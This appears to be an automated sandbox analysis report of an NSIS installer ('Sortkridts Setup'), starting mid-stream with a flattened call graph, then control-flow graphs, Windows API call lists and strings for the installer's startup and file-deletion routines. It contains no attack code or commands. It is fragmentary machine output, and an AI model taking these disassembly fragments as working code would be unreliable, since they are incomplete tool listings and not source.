5227->5232 5229->5230 
5230->5213 5233 4048d2 GlobalFree 5230->5233 5244 404561 5231->5244 5239 40485a SendMessageW 5232->5239 5233->5213 5234->5226 5252 404926 5234->5252 5263 405491 5234->5263 5235->5213 5236->5208 5236->5220 5237 404640 GetWindowLongW SetWindowLongW 5238 404656 5237->5238 5240 40466d 5238->5240 5241 40465d ShowWindow 5238->5241 5239->5234 5257 4054de SendMessageW 5240->5257 5241->5240 5243 4045b9 SendMessageW 5243->5244 5244->5237 5244->5243 5246 4045f5 SendMessageW 5244->5246 5247 404608 SendMessageW 5244->5247 5248 40463c 5244->5248 5246->5244 5247->5244 5248->5237 5248->5238 5249 404a6e 5250 404a8a InvalidateRect 5249->5250 5254 404a99 5249->5254 5250->5254 5251 404964 SendMessageW 5253 40497e 5251->5253 5252->5251 5252->5253 5253->5249 5256 404a14 SendMessageW SendMessageW 5253->5256 5254->5226 5255 40553b 20 API calls 5254->5255 5255->5226 5256->5253 5257->5210 5259 405714 SendMessageW 5258->5259 5260 4056d6 GetMessagePos ScreenToClient SendMessageW 5258->5260 5262 40570c 5259->5262 5261 405711 5260->5261 5260->5262 5261->5259 5262->5236 5272 406af5 lstrcpynW 5263->5272 5265 4054a4 5273 4065fa wsprintfW 5265->5273 5267 4054ae 5268 401533 94 API calls 5267->5268 5269 4054b7 5268->5269 5274 406af5 lstrcpynW 5269->5274 5271 4054be 5271->5252 5272->5265 5273->5267 5274->5271 5275 402e7c SendMessageW 5276 402e94 InvalidateRect 5275->5276 5277 402ea1 5275->5277 5276->5277 4764 4025ff 4765 402608 4764->4765 4766 40262f 4764->4766 4768 4030c1 17 API calls 4765->4768 4767 40303e 17 API calls 4766->4767 4769 402636 4767->4769 4770 40260f 4768->4770 4776 40307c 4769->4776 4772 402615 4770->4772 4775 402648 4770->4775 4773 40303e 17 API calls 4772->4773 4774 40261c RegDeleteValueW RegCloseKey 4773->4774 4774->4775 4777 403089 4776->4777 4778 403090 4776->4778 4777->4775 4778->4777 4780 40141e 4778->4780 4781 4062b3 RegOpenKeyExW 4780->4781 4782 40145b 4781->4782 4783 401463 4782->4783 4784 401527 4782->4784 4785 40146f RegEnumValueW 4783->4785 4794 401493 4783->4794 
4784->4777 4786 401503 RegCloseKey 4785->4786 4785->4794 4786->4784 4787 4014ce RegEnumKeyW 4788 4014d8 RegCloseKey 4787->4788 4787->4794 4789 4068c1 5 API calls 4788->4789 4791 4014e9 4789->4791 4790 40141e 6 API calls 4790->4794 4792 401514 4791->4792 4793 4014ed RegDeleteKeyW 4791->4793 4792->4784 4793->4784 4794->4786 4794->4787 4794->4788 4794->4790 5278 401000 5279 401039 BeginPaint GetClientRect 5278->5279 5280 40100a DefWindowProcW 5278->5280 5282 40110f 5279->5282 5283 40119a 5280->5283 5284 401117 5282->5284 5285 40107e CreateBrushIndirect FillRect DeleteObject 5282->5285 5286 401185 EndPaint 5284->5286 5287 40111d CreateFontIndirectW 5284->5287 5285->5282 5286->5283 5287->5286 5288 401130 6 API calls 5287->5288 5288->5286 3813 401d01 3814 401d5d 3813->3814 3815 401d0f 3813->3815 3816 401d67 3814->3816 3817 401d8c GlobalAlloc 3814->3817 3818 401d50 3815->3818 3822 401d1e 3815->3822 3823 401709 3816->3823 3850 406af5 lstrcpynW 3816->3850 3830 405e95 3817->3830 3819 405e95 17 API calls 3818->3819 3819->3814 3847 406af5 lstrcpynW 3822->3847 3824 401d79 GlobalFree 3824->3823 3826 401d2d 3848 406af5 lstrcpynW 3826->3848 3828 401d3c 3849 406af5 lstrcpynW 3828->3849 3844 405ea0 3830->3844 3831 4060ee 3831->3823 3832 4060d9 3832->3831 3858 406af5 lstrcpynW 3832->3858 3834 4060a4 lstrlenW 3834->3844 3835 405fb9 GetSystemDirectoryW 3835->3844 3837 405e95 10 API calls 3837->3834 3838 405fcc GetWindowsDirectoryW 3838->3844 3841 405ff9 SHGetSpecialFolderLocation 3843 406011 SHGetPathFromIDListW CoTaskMemFree 3841->3843 3841->3844 3842 405e95 10 API calls 3842->3844 3843->3844 3844->3832 3844->3834 3844->3835 3844->3837 3844->3838 3844->3841 3844->3842 3845 406045 lstrcatW 3844->3845 3846 406d18 CharNextW CharNextW CharNextW CharNextW CharPrevW 3844->3846 3851 406952 3844->3851 3856 4065fa wsprintfW 3844->3856 3857 406af5 lstrcpynW 3844->3857 3845->3844 3846->3844 3847->3826 3848->3828 3849->3823 3850->3824 3859 4062b3 3851->3859 3854 4069b8 3854->3844 3855 406987 
RegQueryValueExW RegCloseKey 3855->3854 3856->3844 3857->3844 3858->3831 3860 4062c2 3859->3860 3861 4062c6 3860->3861 3862 4062cb RegOpenKeyExW 3860->3862 3861->3854 3861->3855 3862->3861 5289 401b03 5290 403002 17 API calls 5289->5290 5291 401b0a 5290->5291 5292 403002 17 API calls 5291->5292 5293 401b15 5292->5293 5294 40303e 17 API calls 5293->5294 5295 401b20 lstrlenW 5294->5295 5296 401b3c 5295->5296 5298 401b67 5295->5298 5296->5298 5301 406af5 lstrcpynW 5296->5301 5299 401b5b 5299->5298 5300 401b5f lstrlenW 5299->5300 5300->5298 5301->5299 5302 6fc31000 5303 6fc3101b 5 API calls 5302->5303 5304 6fc31019 5303->5304 5305 401c04 5306 403002 17 API calls 5305->5306 5307 401c0e 5306->5307 5308 403002 17 API calls 5307->5308 5309 401bb2 5308->5309 5310 401b88 5311 40303e 17 API calls 5310->5311 5312 401b8f 5311->5312 5313 40303e 17 API calls 5312->5313 5314 401b98 5313->5314 5315 401ba0 lstrcmpiW 5314->5315 5316 401ba8 lstrcmpW 5314->5316 5317 401bae 5315->5317 5316->5317 5318 6fc31b0a 5319 6fc31b38 5318->5319 5320 6fc32351 21 API calls 5319->5320 5321 6fc31b3f 5320->5321 5322 6fc31b52 5321->5322 5323 6fc31b46 5321->5323 5325 6fc31b73 5322->5325 5326 6fc31b5c 5322->5326 5324 6fc315eb 2 API calls 5323->5324 5329 6fc31b50 5324->5329 5327 6fc31b79 5325->5327 5328 6fc31b9f 5325->5328 5330 6fc315c5 3 API calls 5326->5330 5331 6fc31668 3 API calls 5327->5331 5332 6fc315c5 3 API calls 5328->5332 5333 6fc31b61 5330->5333 5334 6fc31b7e 5331->5334 5332->5329 5335 6fc31668 3 API calls 5333->5335 5336 6fc315eb 2 API calls 5334->5336 5337 6fc31b67 5335->5337 5339 6fc31b84 GlobalFree 5336->5339 5338 6fc315eb 2 API calls 5337->5338 5340 6fc31b6d GlobalFree 5338->5340 5339->5329 5339->5340 5342 404b0b 5343 404cb4 5342->5343 5344 404b28 GetDlgItem GetDlgItem GetDlgItem 5342->5344 5346 404d00 5343->5346 5347 404cbc GetDlgItem CreateThread CloseHandle 5343->5347 5387 4054de SendMessageW 5344->5387 5349 404d31 5346->5349 5350 404d08 5346->5350 5364 404ce8 5347->5364 5348 404ba1 5354 
404ba8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 5348->5354 5353 404d39 5349->5353 5356 404d7f 5349->5356 5352 404d14 ShowWindow ShowWindow 5350->5352 5350->5364 5351 405736 8 API calls 5355 404cf6 5351->5355 5389 4054de SendMessageW 5352->5389 5358 404d42 5353->5358 5359 404d55 ShowWindow 5353->5359 5361 404bf8 SendMessageW SendMessageW 5354->5361 5362 404c0c 5354->5362 5363 404d92 SendMessageW 5356->5363 5356->5364 5369 405933 SendMessageW 5358->5369 5359->5358 5360 404d6c 5359->5360 5365 405d15 24 API calls 5360->5365 5361->5362 5366 404c14 SendMessageW 5362->5366 5367 404c1e 5362->5367 5363->5355 5368 404db0 CreatePopupMenu 5363->5368 5364->5351 5365->5358 5366->5367 5370 4054f5 18 API calls 5367->5370 5371 405e95 17 API calls 5368->5371 5369->5364 5372 404c30 5370->5372 5373 404dc2 AppendMenuW 5371->5373 5374 404c39 ShowWindow 5372->5374 5375 404c6b GetDlgItem SendMessageW 5372->5375 5376 404de4 GetWindowRect 5373->5376 5377 404df8 TrackPopupMenu 5373->5377 5379 404c5a 5374->5379 5380 404c4f ShowWindow 5374->5380 5375->5355 5378 404c97 SendMessageW SendMessageW 5375->5378 5376->5377 5377->5355 5381 404e1a 5377->5381 5378->5355 5388 4054de SendMessageW 5379->5388 5380->5379 5382 404e2e SendMessageW 5381->5382 5382->5382 5384 404e4a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5382->5384 5385 404e76 SendMessageW 5384->5385 5385->5385 5386 404ea4 GlobalUnlock SetClipboardData CloseClipboard 5385->5386 5386->5355 5387->5348 5388->5375 5389->5364 5390 401e8e 5391 403002 17 API calls 5390->5391 5392 401e94 IsWindow 5391->5392 5393 401bb2 5392->5393 5394 404f0e 5395 404f32 5394->5395 5396 404f1a 5394->5396 5398 404f66 5395->5398 5399 404f38 SHGetPathFromIDListW 5395->5399 5404 406a15 GetDlgItemTextW 5396->5404 5400 404f48 5399->5400 5403 404f27 SendMessageW 5399->5403 5402 401533 94 API calls 5400->5402 5402->5403 5403->5398 5404->5403 4694 40211b 4695 40303e 17 API calls 4694->4695 4696 402121 4695->4696 4697 405d15 24 API calls 4696->4697 4698 
40212b 4697->4698 4699 4066b1 2 API calls 4698->4699 4700 402131 4699->4700 4701 40215b 4700->4701 4705 401709 4700->4705 4707 4064ef WaitForSingleObject 4700->4707 4703 402110 CloseHandle 4701->4703 4701->4705 4703->4705 4704 40214b 4704->4701 4712 4065fa wsprintfW 4704->4712 4708 406506 4707->4708 4709 40651c GetExitCodeProcess 4708->4709 4710 4061ea 2 API calls 4708->4710 4709->4704 4711 40650d WaitForSingleObject 4710->4711 4711->4708 4712->4701 4740 40291d 4741 403002 17 API calls 4740->4741 4748 40292e 4741->4748 4742 402aa2 SetFilePointer 4743 402aee 4745 402980 ReadFile 4745->4742 4745->4748 4746 406923 ReadFile 4746->4748 4747 402a3d 4747->4742 4747->4748 4754 40645f SetFilePointer 4747->4754 4748->4742 4748->4743 4748->4745 4748->4746 4748->4747 4749 402ae4 4748->4749 4750 4029c5 MultiByteToWideChar 4748->4750 4753 4029f6 SetFilePointer MultiByteToWideChar 4748->4753 4763 4065fa wsprintfW 4749->4763 4750->4748 4753->4748 4755 40647b 4754->4755 4756 406496 4754->4756 4757 406923 ReadFile 4755->4757 4756->4747 4758 406487 4757->4758 4758->4756 4759 4064c7 SetFilePointer 4758->4759 4760 40649f SetFilePointer 4758->4760 4759->4756 4760->4759 4761 4064aa 4760->4761 4762 4069e6 WriteFile 4761->4762 4762->4756 4763->4743 5405 40219d 5406 40303e 17 API calls 5405->5406 5407 4021a4 5406->5407 5408 4068c1 5 API calls 5407->5408 5409 4021b5 5408->5409 5410 4021ce GlobalAlloc 5409->5410 5413 402ea5 5409->5413 5411 4021e3 5410->5411 5410->5413 5412 4068c1 5 API calls 5411->5412 5414 4021ea 5412->5414 5415 4068c1 5 API calls 5414->5415 5417 4021f3 5415->5417 5416 40224e GlobalFree 5416->5413 5417->5416 5422 4065fa wsprintfW 5417->5422 5419 402237 5423 4065fa wsprintfW 5419->5423 5421 40224c 5421->5416 5422->5419 5423->5421 5424 401aa1 5425 401aa2 5424->5425 5426 40303e 17 API calls 5425->5426 5427 401aa7 5426->5427 5428 4066f4 66 API calls 5427->5428 5429 401ab1 5428->5429 5430 403d23 5431 403d2e 5430->5431 5432 403d32 5431->5432 5433 403d35 GlobalAlloc 5431->5433 
5433->5432 5434 402ba3 5435 40303e 17 API calls 5434->5435 5436 402bb2 5435->5436 5437 402bc9 5436->5437 5438 40303e 17 API calls 5436->5438 5439 406b78 2 API calls 5437->5439 5438->5437 5440 402bcf 5439->5440 5462 4068f6 GetFileAttributesW CreateFileW 5440->5462 5442 402bdc 5443 402cb7 5442->5443 5446 402c9f 5442->5446 5447 402bfd GlobalAlloc 5442->5447 5444 402cc0 DeleteFileW 5443->5444 5445 402ccf 5443->5445 5444->5445 5449 403148 35 API calls 5446->5449 5447->5446 5448 402c1d 5447->5448 5463 403131 SetFilePointer 5448->5463 5451 402cac CloseHandle 5449->5451 5451->5443 5452 402c23 5453 40311b ReadFile 5452->5453 5454 402c2d GlobalAlloc 5453->5454 5455 402c43 5454->5455 5456 402c84 5454->5456 5457 403148 35 API calls 5455->5457 5458 4069e6 WriteFile 5456->5458 5461 402c52 5457->5461 5459 402c93 GlobalFree 5458->5459 5459->5446 5460 402c7a GlobalFree 5460->5456 5461->5460 5462->5442 5463->5452 5464 6fc31aa7 5465 6fc3156c GlobalFree 5464->5465 5467 6fc31abf 5465->5467 5466 6fc31b01 GlobalFree 5467->5466 5468 6fc31add 5467->5468 5469 6fc31aed VirtualFree 5467->5469 5468->5466 5469->5466 3874 402728 3885 4030c1 3874->3885 3879 402748 RegQueryValueExW 3881 40276b 3879->3881 3884 402772 3879->3884 3880 401709 3881->3884 3895 4065fa wsprintfW 3881->3895 3882 40271c RegCloseKey 3882->3880 3884->3880 3884->3882 3886 40303e 17 API calls 3885->3886 3887 4030d9 3886->3887 3888 4062b3 RegOpenKeyExW 3887->3888 3889 402732 3888->3889 3890 40303e 3889->3890 3891 405e95 17 API calls 3890->3891 3892 403067 3891->3892 3893 40273b 3892->3893 3896 406d18 3892->3896 3893->3879 3893->3880 3895->3884 3902 406d2d 3896->3902 3897 406daf 3898 406db7 CharPrevW 3897->3898 3900 406dd7 3897->3900 3898->3897 3899 406da0 CharNextW 3899->3897 3899->3902 3900->3893 3902->3897 3902->3899 3903 406d8c CharNextW 3902->3903 3904 406d9b CharNextW 3902->3904 3905 4065d1 3902->3905 3903->3902 3904->3899 3906 4065f7 3905->3906 3907 4065dd 3905->3907 3906->3902 3907->3906 3908 4065e6 CharNextW 3907->3908 
3908->3906 3908->3907 5470 402b28 5471 402b2e 5470->5471 5472 402b36 FindClose 5471->5472 5473 402ea1 5471->5473 5472->5473 5474 40362a 5475 403650 5474->5475 5476 40363c SetTimer 5474->5476 5477 403659 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5475->5477 5478 4036a7 5475->5478 5476->5477 5477->5478 5479 4058ab 5480 4058c0 5479->5480 5481 4058d4 5479->5481 5483 4058c6 5480->5483 5484 405919 CallWindowProcW 5480->5484 5482 4058dc IsWindowVisible 5481->5482 5489 4058f3 5481->5489 5482->5484 5485 4058e9 5482->5485 5487 4054c3 SendMessageW 5483->5487 5486 4058d0 5484->5486 5488 4056b5 5 API calls 5485->5488 5487->5486 5488->5489 5489->5484 5490 405491 94 API calls 5489->5490 5490->5484 5491 4025ac 5492 40303e 17 API calls 5491->5492 5493 4025bd 5492->5493 5494 40303e 17 API calls 5493->5494 5495 4025c6 5494->5495 5496 40303e 17 API calls 5495->5496 5497 4025cf GetPrivateProfileStringW 5496->5497 5498 4025f4 5497->5498 5499 401ead 5500 403002 17 API calls 5499->5500 5501 401eb4 5500->5501 5502 403002 17 API calls 5501->5502 5503 401ebd GetDlgItem 5502->5503 3912 4027b0 3913 4030c1 17 API calls 3912->3913 3914 4027ba 3913->3914 3915 403002 17 API calls 3914->3915 3916 4027c3 3915->3916 3917 4027d5 3916->3917 3921 401709 3916->3921 3918 4027f0 RegEnumValueW 3917->3918 3919 4027e4 RegEnumKeyW 3917->3919 3920 40280e RegCloseKey 3918->3920 3919->3920 3920->3921 5504 405630 lstrcpynW lstrlenW 5505 401ab6 5506 40303e 17 API calls 5505->5506 5507 401abd 5506->5507 5508 406a83 MessageBoxIndirectW 5507->5508 5509 401709 5508->5509 5510 402837 5511 40303e 17 API calls 5510->5511 5514 401afd 5511->5514 5513 402855 5514->5510 5514->5513 5515 4068f6 GetFileAttributesW CreateFileW 5514->5515 5515->5514 5516 401fb8 GetDC 5517 403002 17 API calls 5516->5517 5518 401fc8 GetDeviceCaps MulDiv ReleaseDC 5517->5518 5519 403002 17 API calls 5518->5519 5520 401ff8 5519->5520 5521 405e95 17 API calls 5520->5521 5522 402032 CreateFontIndirectW 5521->5522 5523 6fc3103a 5525 6fc31052 
5523->5525 5524 6fc310c5 5525->5524 5526 6fc31081 5525->5526 5527 6fc31061 5525->5527 5529 6fc3156c GlobalFree 5526->5529 5528 6fc3156c GlobalFree 5527->5528 5530 6fc31072 5528->5530 5533 6fc31079 5529->5533 5531 6fc3156c GlobalFree 5530->5531 5531->5533 5532 6fc31091 GlobalSize 5534 6fc3109a 5532->5534 5533->5532 5533->5534 5535 6fc310af 5534->5535 5536 6fc3109e GlobalAlloc 5534->5536 5538 6fc310b8 GlobalFree 5535->5538 5537 6fc315c5 3 API calls 5536->5537 5537->5535 5538->5524 5539 401dba 5540 403002 17 API calls 5539->5540 5541 401dc1 5540->5541 5542 403002 17 API calls 5541->5542 5543 401dce 5542->5543 5544 40303e 17 API calls 5543->5544 5547 401de1 5543->5547 5544->5547 5545 401e50 5550 40303e 17 API calls 5545->5550 5546 401e01 5549 403002 17 API calls 5546->5549 5548 40303e 17 API calls 5547->5548 5551 401df6 5547->5551 5548->5551 5552 401e06 5549->5552 5553 401e55 5550->5553 5551->5545 5551->5546 5554 403002 17 API calls 5552->5554 5555 40303e 17 API calls 5553->5555 5556 401e11 5554->5556 5557 401e5e FindWindowExW 5555->5557 5558 401e41 SendMessageW 5556->5558 5559 401e1e SendMessageTimeoutW 5556->5559 5560 401e7b 5557->5560 5558->5560 5559->5560 5561 401bbb 5562 40303e 17 API calls 5561->5562 5563 401bc4 ExpandEnvironmentStringsW 5562->5563 5564 401bd7 5563->5564 5565 401be9 5563->5565 5564->5565 5566 401bdd lstrcmpW 5564->5566 5566->5565 5567 6fc32ebf 5568 6fc32ed7 5567->5568 5569 6fc31309 2 API calls 5568->5569 5570 6fc32ef2 5569->5570

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 4036d7-403720 SetErrorMode GetVersionExW 1 403722-403742 GetVersionExW 0->1 2 403759 0->2 4 403744-403748 1->4 5 403755-403757 1->5 3 403760-403765 2->3 7 403772 3->7 8 403767-403770 3->8 6 40374b-403753 4->6 5->6 6->3 9 403776-4037b8 7->9 8->9 10 4037ba-4037c2 call 4068c1 9->10 11 4037cb 9->11 10->11 16 4037c4 10->16 13 4037d0-4037e2 call 406179 lstrlenA 11->13 18 4037e4-403800 call 4068c1 * 3 13->18 16->11 25 403811-4038aa #17 OleInitialize SHGetFileInfoW call 406af5 GetCommandLineW call 406af5 call 4065d1 CharNextW 18->25 26 403802-403808 18->26 35 4038b0 25->35 36 403985-40399f GetTempPathW call 403c80 25->36 26->25 30 40380a 26->30 30->25 37 4038b2-4038b8 35->37 44 4039a1-4039bf GetWindowsDirectoryW lstrcatW call 403c80 36->44 45 4039f7-403a10 DeleteFileW call 4033c8 36->45 39 4038c5-4038d0 37->39 40 4038ba-4038c3 37->40 42 4038d2-4038d9 39->42 43 4038db-4038ea 39->43 40->39 40->40 42->43 47 403945-403959 call 4065d1 43->47 48 4038ec-4038f8 43->48 44->45 62 4039c1-4039f1 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403c80 44->62 56 403bc1 45->56 57 403a16-403a1c 45->57 65 403961-403967 47->65 66 40395b-40395e 47->66 52 403912-403918 48->52 53 4038fa-403901 48->53 60 403934-40393b 52->60 61 40391a-403921 52->61 58 403903-403906 53->58 59 403908 53->59 69 403bc5-403bd2 call 4036ad OleUninitialize 56->69 67 403a81-403a88 call 405a19 57->67 68 403a1e-403a30 call 4065d1 57->68 58->52 58->59 59->52 60->47 63 40393d-403943 60->63 61->60 70 403923-40392a 61->70 62->45 79 403bbf 62->79 63->47 71 403971-403980 call 406af5 63->71 65->36 73 403969-40396c 65->73 66->65 81 403a8d-403a8f 67->81 84 403a46-403a48 68->84 85 403bd4-403bdf call 406a83 69->85 86 403be7-403bee 69->86 77 403931 70->77 78 40392c-40392f 70->78 71->36 73->37 77->60 78->60 78->77 79->56 81->69 90 403a32-403a38 84->90 91 403a4a-403a51 84->91 92 403be1 ExitProcess 85->92 88 403bf0-403c06 GetCurrentProcess OpenProcessToken 86->88 89 
403c6c-403c7b 86->89 94 403c08-403c36 LookupPrivilegeValueW AdjustTokenPrivileges 88->94 95 403c3c-403c4a call 4068c1 88->95 89->92 96 403a43 90->96 97 403a3a-403a41 90->97 98 403a53-403a63 call 406613 91->98 99 403a94-403aac call 4064d7 lstrcatW 91->99 94->95 108 403c58-403c63 ExitWindowsEx 95->108 109 403c4c-403c56 95->109 96->84 97->91 97->96 106 403a69-403a7f call 406af5 * 2 98->106 107 403bbb-403bbd 98->107 110 403abd-403ade lstrcatW lstrcmpiW 99->110 111 403aae-403ab8 lstrcatW 99->111 106->67 107->69 108->89 113 403c65-403c67 call 401533 108->113 109->108 109->113 110->107 114 403ae4-403aeb 110->114 111->110 113->89 118 403af4 call 405df9 114->118 119 403aed-403af2 call 405e19 114->119 124 403af9-403b0b SetCurrentDirectoryW 118->124 119->124 126 403b1c-403b36 call 406af5 124->126 127 403b0d-403b17 call 406af5 124->127 131 403b37-403b55 call 405e95 DeleteFileW 126->131 127->126 134 403ba4-403bae 131->134 135 403b57-403b6b CopyFileW 131->135 134->131 136 403bb0-403bb6 call 406218 134->136 135->134 137 403b6d-403b99 call 406218 call 405e95 call 4066b1 135->137 136->107 137->134 145 403b9b-403ba2 CloseHandle 137->145 145->134
                                APIs
                                • SetErrorMode.KERNELBASE(00008001), ref: 004036F3
                                • GetVersionExW.KERNEL32 ref: 0040371C
                                • GetVersionExW.KERNEL32(?), ref: 0040372F
                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004037D7
                                • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403811
                                • OleInitialize.OLE32(00000000), ref: 00403818
                                • SHGetFileInfoW.SHELL32(004085B0,00000000,?,000002B4,00000000), ref: 00403837
                                • GetCommandLineW.KERNEL32(Sortkridts Setup,NSIS Error), ref: 0040384C
                                • CharNextW.USER32(00000000,"C:\Users\user\AppData\Local\Temp\temp_executable.exe" ,?,"C:\Users\user\AppData\Local\Temp\temp_executable.exe" ,00000000), ref: 00403898
                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403996
                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004039A7
                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039B3
                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039C7
                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004039CF
                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004039E0
                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004039E8
                                • DeleteFileW.KERNELBASE(1033), ref: 00403A02
                                  • Part of subcall function 004033C8: GetTickCount.KERNEL32 ref: 004033DB
                                  • Part of subcall function 004033C8: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\temp_executable.exe,00000400,?,?,?,?,?), ref: 004033F7
                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\AppData\Local\Temp\temp_executable.exe" ,00000000,00000000), ref: 00403AA5
                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00408600,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\AppData\Local\Temp\temp_executable.exe" ,00000000,00000000), ref: 00403AB8
                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\AppData\Local\Temp\temp_executable.exe" ,00000000,00000000), ref: 00403AC7
                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\AppData\Local\Temp\temp_executable.exe" ,00000000,00000000), ref: 00403AD6
                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AFE
                                • DeleteFileW.KERNEL32(004209C0,004209C0,?,0042A000,?), ref: 00403B51
                                • CopyFileW.KERNEL32(C:\Users\user\AppData\Local\Temp\temp_executable.exe,004209C0,00000001), ref: 00403B63
                                • CloseHandle.KERNEL32(00000000,004209C0,004209C0,?,004209C0,00000000), ref: 00403B9C
                                  • Part of subcall function 00405DF9: CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CA4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76073420,0040399D), ref: 00405E01
                                  • Part of subcall function 00405DF9: GetLastError.KERNEL32 ref: 00405E0B
                                • OleUninitialize.OLE32(00000000), ref: 00403BCA
                                • ExitProcess.KERNEL32 ref: 00403BE1
                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403BF7
                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403BFE
                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403C13
                                • AdjustTokenPrivileges.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000), ref: 00403C36
                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C5B
                                  • Part of subcall function 004065D1: CharNextW.USER32(?,00403897,"C:\Users\user\AppData\Local\Temp\temp_executable.exe" ,?,"C:\Users\user\AppData\Local\Temp\temp_executable.exe" ,00000000), ref: 004065E7
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Filelstrcat$DirectoryProcess$CharCurrentDeleteEnvironmentErrorExitNextPathTempTokenVariableVersionWindows$AdjustCloseCommandCopyCountCreateHandleInfoInitializeLastLineLookupModeModuleNameOpenPrivilegePrivilegesTickUninitializeValuelstrcmpilstrlen
                                • String ID: "C:\Users\user\AppData\Local\Temp\temp_executable.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\identitetsproblemer\Mercerising$C:\Users\user\AppData\Local\Temp\identitetsproblemer\Mercerising\Trichoschistic$C:\Users\user\AppData\Local\Temp\temp_executable.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$Sortkridts Setup$TEMP$TMP$UXTHEME$\Temp$~nsu
                                • API String ID: 1152188737-102299959
                                • Opcode ID: 0a6dd509e07941f5201f59f66d64ee85ec59a5133d30cf212f22df12b7490388
                                • Instruction ID: 07a9971b8f29bbd68b878d9119023e68a6b74827d1d77f0d98df9434206269f1
                                • Opcode Fuzzy Hash: 0a6dd509e07941f5201f59f66d64ee85ec59a5133d30cf212f22df12b7490388
                                • Instruction Fuzzy Hash: 4FD137712043116AD7207F619D46B6B3AACAB4574AF51443FF582B62D2DBBC8E408B2E

                                Control-flow Graph

                                control_flow_graph 531 4066f4-40671d call 406613 534 406736-406740 531->534 535 40671f-406731 DeleteFileW 531->535 537 406742-406744 534->537 538 406753-406766 call 406af5 534->538 536 4068b5-4068be 535->536 539 4068a4-4068aa 537->539 540 40674a-40674d 537->540 545 406776-406777 call 406ceb 538->545 546 406768-406774 lstrcatW 538->546 544 4068b4 539->544 540->538 542 40686d-406875 call 4065aa 540->542 542->544 553 406877-40688b call 406531 call 406560 542->553 544->536 548 40677c-406781 545->548 546->548 551 406783-40678b 548->551 552 40678d-406793 lstrcatW 548->552 551->552 555 406795-4067b8 lstrlenW FindFirstFileW 551->555 552->555 567 4068ac-4068af call 405d15 553->567 568 40688d-40688f 553->568 556 406856-40685b 555->556 557 4067be-4067c0 555->557 556->544 561 40685d-40686b 556->561 559 4067c1-4067c6 557->559 562 4067c8-4067ce 559->562 563 4067df-4067f2 call 406af5 559->563 561->539 561->542 565 4067d0-4067d5 562->565 566 406838-406849 FindNextFileW 562->566 576 4067f4-4067fb 563->576 577 406806-40680f call 406560 563->577 565->563 570 4067d7-4067dd 565->570 566->559 573 40684f-406850 FindClose 566->573 567->544 568->539 571 406891-4068a2 call 405d15 call 406218 568->571 570->563 570->566 571->544 573->556 576->566 579 4067fd-4067ff call 4066f4 576->579 586 406830-406833 call 405d15 577->586 587 406811-406813 577->587 585 406804 579->585 585->566 586->566 588 406815-406826 call 405d15 call 406218 587->588 589 406828-40682e 587->589 588->566 589->566
                                APIs
